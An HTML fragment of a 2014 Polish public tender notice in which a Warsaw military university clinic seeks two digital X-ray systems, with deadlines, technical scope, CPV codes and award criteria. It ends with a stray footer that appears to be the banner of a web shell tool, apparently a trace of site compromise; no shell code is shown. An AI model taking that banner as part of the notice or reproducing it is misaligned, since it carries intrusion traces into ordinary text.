<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2014 godzina 09:00, miejsce: Przychodnia Lekarska Wojskowej Akademii Technicznej SP ZOZ, 01-480, ul. Kartezjusza 2, Warszawa, Kancelaria pok. 109, lub Sekcja Zam. Publ. pok. 411.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zestaw do ucyfrowienia aparatu RTG Optima Millenium w Poradni Radiologicznej; system do pośredniej radiografii cyfrowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Specyfikacja techniczna zamawianego zestawu podana jest w Zał. Nr 1.
Oferowany sprzęt oraz oprogramowanie muszą być zgodne z opisem przedstawionym w formularzu specyfikacji technicznych w Zał. Nr 1. Jeżeli w ofercie zostanie przedstawiony sprzęt lub zestaw niespełniający wymagań tam określonych oferta zostanie odrzucona, ponieważ jej treść nie będzie odpowiadać treści specyfikacji istotnych warunków zamówienia. Parametry opisane w wymienionym załączniku należy traktować jako minimalne. Oznacza to, że Wykonawca może zawsze zaoferować sprzęt lub zestaw o parametrach lepszych, przewyższających opisane parametry przez Zamawiającego. 
Oferowany zestaw musi być fabrycznie nowy, rok produkcji 2014, nie pochodzący  z wystawy i pokazów, kompletny, z zapewnieniem, aby do jego uruchomienia oraz stosowania zgodnie z przeznaczeniem nie były konieczne zakupy dodatkowych elementów i akcesoriów, poza materiałami eksploatacyjnymi.
Oferowany zestaw musi posiadać dokumenty w języku polskim, potwierdzające dopuszczenie do obrotu i stosowania zgodnie z zasadami określonymi w Zał. I wymagania w zakresie ochrony zdrowia i bezpieczeństwa odnoszące się do projektowania i wykonywania maszyn: Dyrektywa w sprawie maszyn 2006/42/WE oraz w Zał. II - Deklaracja zgodności CE, całkowite zapewnienie jakości, do Dyrektywy 93/42 EWG dotyczącej wyrobów medycznych  oraz ustawą o wyrobach medycznych. 
Zamówienie obejmuje: Dostawę zestawu do siedziby Zamawiającego; Ścisłą współpracę z Zamawiającym na etapie wykonywania prac przygotowawczych do uruchomienia zestawu; Montaż, instalację i uruchomienie wszystkich dostarczonych urządzeń wraz z oprogramowaniem w Pracowni Radiologicznej i gabinetach lekarskich w budynku Przychodni Lekarskiej WAT SP ZOZ; Przygotowanie stanowisk komputerowych, instalacja i konfiguracja bazy danych, modułów programowych, konfigurację systemu; Dostarczenie niezbędnej dokumentacji technicznej, serwisowej, kart gwarancyjnych; dokumentów dopuszczających do obrotu i stosowania, oraz dokumentów potwierdzających autoryzację Wykonawcy na terenie Polski w zakresie sprzedaży, serwisu gwarancyjnego i pogwarancyjnego;  Przeprowadzenie u Zamawiającego w uzgodnionych terminach szkolenia dla wyznaczonych pracowników medycznych i administratorów systemu w zakresie użytkowania i eksploatacji dostarczonego sprzętu i oprogramowania; Serwis gwarancyjny i pogwarancyjny dostarczonego sprzętu w terminach ustalonych w warunkach umowy oraz nadzór autorski i inżynierski oprogramowania.
Ofertę należy złożyć, wg wzoru Zał. Nr 3.1. Wzór umowy zawiera Zał. Nr 8.1.
Zamawiający zaprasza, po uprzednio telefonicznie uzgodnionym terminie na spotkanie informacyjne Wykonawców zainteresowanych udziałem w przetargu w dniach 07-09. 04.2014 r. w godzinach 08:00-13:00, w siedzibie Zamawiającego - Przychodnia Lekarska WAT SP ZOZ ul. Kartezjusza 2, 01-480 Warszawa, w pok. Nr 116; tel. (22) 683-82-22 w celu udzielenia ew. informacji niezbędnych do przygotowania oferty oraz należytej realizacji zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.16.00-7, 38.58.20.00-8, 30.23.60.00-2, 51.41.10.00-6, 48.18.00.00-3, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zestaw do radiografii cyfrowej, w którego skład  wchodzą: aparat RTG stomatologiczny, radiografia cyfrowa z czujnikiem..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Specyfikacja techniczna zamawianego zestawu podana jest w Zał. Nr 2.
Oferowany sprzęt oraz oprogramowanie muszą być zgodne z opisem przedstawionym w formularzu specyfikacji technicznych w Zał. Nr 2. Jeżeli w ofercie zostanie przedstawiony sprzęt lub zestaw niespełniający wymagań tam określonych oferta zostanie odrzucona, ponieważ jej treść nie będzie odpowiadać treści specyfikacji istotnych warunków zamówienia. Parametry opisane w wymienionym załączniku należy traktować jako minimalne. Oznacza to, że Wykonawca może zawsze zaoferować sprzęt lub zestaw o parametrach lepszych, przewyższających opisane parametry przez Zamawiającego. 
Oferowany zestaw musi być fabrycznie nowy, rok produkcji 2014, w tym wymaga się, aby system radiografii cyfrowej był wprowadzony do sprzedaży na rynku nie dawniej niż  1 rok temu, kompletny, z zapewnieniem, aby do jego uruchomienia oraz stosowania zgodnie z przeznaczeniem nie były konieczne zakupy dodatkowych elementów i akcesoriów, poza materiałami eksploatacyjnymi.
Oferowany zestaw musi posiadać dokumenty w języku polskim, potwierdzające dopuszczenie do obrotu i stosowania zgodnie z zasadami określonymi w Zał. I Dyrektyw Unijnych, wymagania w zakresie ochrony zdrowia i bezpieczeństwa odnoszące się do projektowania i wykonywania maszyn: Dyrektywa w sprawie maszyn 2006/42/WE oraz w Zał. II - Deklaracja zgodności CE, całkowite zapewnienie jakości, do Dyrektywy 93/42 EWG dotyczącej wyrobów medycznych  oraz ustawą o wyrobach medycznych. 
Zamówienie obejmuje: Dostawę zestawu do siedziby Zamawiającego; Ścisłą współpracę z Zamawiającym na etapie wykonywania prac przygotowawczych do uruchomienia zestawu; Montaż, instalację i uruchomienie wszystkich dostarczonych urządzeń wraz z oprogramowaniem w Pracowni Radiologicznej i gabinetach stomatologicznych w budynku Przychodni Lekarskiej WAT SP ZOZ; Wykonanie testów odbiorczych, akceptacyjnych) dla aparatu RTG stomatologicznego, zgodnie z rozporządzeniem Ministra Zdrowia z dnia 18 lutego 2011r. w sprawie warunków bezpiecznego stosowania promieniowania jonizującego dla wszystkich rodzajów ekspozycji medycznej;
Przygotowanie stanowisk komputerowych, instalacja i konfiguracja bazy danych, modułów programowych, konfigurację systemu; Dostarczenie niezbędnej dokumentacji technicznej, serwisowej, kart gwarancyjnych; dokumentów dopuszczających do obrotu i stosowania, oraz dokumentów potwierdzających autoryzację Wykonawcy na terenie Polski w zakresie sprzedaży, serwisu gwarancyjnego i pogwarancyjnego;  Przeprowadzenie u Zamawiającego w uzgodnionych terminach szkolenia dla wyznaczonych pracowników medycznych i administratorów systemu w zakresie użytkowania i eksploatacji dostarczonego sprzętu i oprogramowania; Serwis gwarancyjny i pogwarancyjny dostarczonego sprzętu w terminach ustalonych w warunkach umowy oraz nadzór autorski i inżynierski oprogramowania.
Ofertę należy złożyć, wg wzoru Zał. Nr 3.2. Wzór umowy zawiera Zał. Nr 8.2.
Zamawiający zaprasza, po uprzednio telefonicznie uzgodnionym terminie na spotkanie informacyjne Wykonawców zainteresowanych udziałem w przetargu w dniach 07-09. 04.2014 r. w godzinach 08:00-13:00, w siedzibie Zamawiającego - Przychodnia Lekarska WAT SP ZOZ ul. Kartezjusza 2, 01-480 Warszawa, w pok. Nr 116; tel. (22) 683-82-22 w celu udzielenia ew. informacji niezbędnych do przygotowania oferty oraz należytej realizacji zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.10.00-1, 33.11.13.00-4, 33.11.15.00-6, 33.11.16.00-7, 38.58.20.00-8, 51.41.10.00-6, 48.18.00.00-3, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com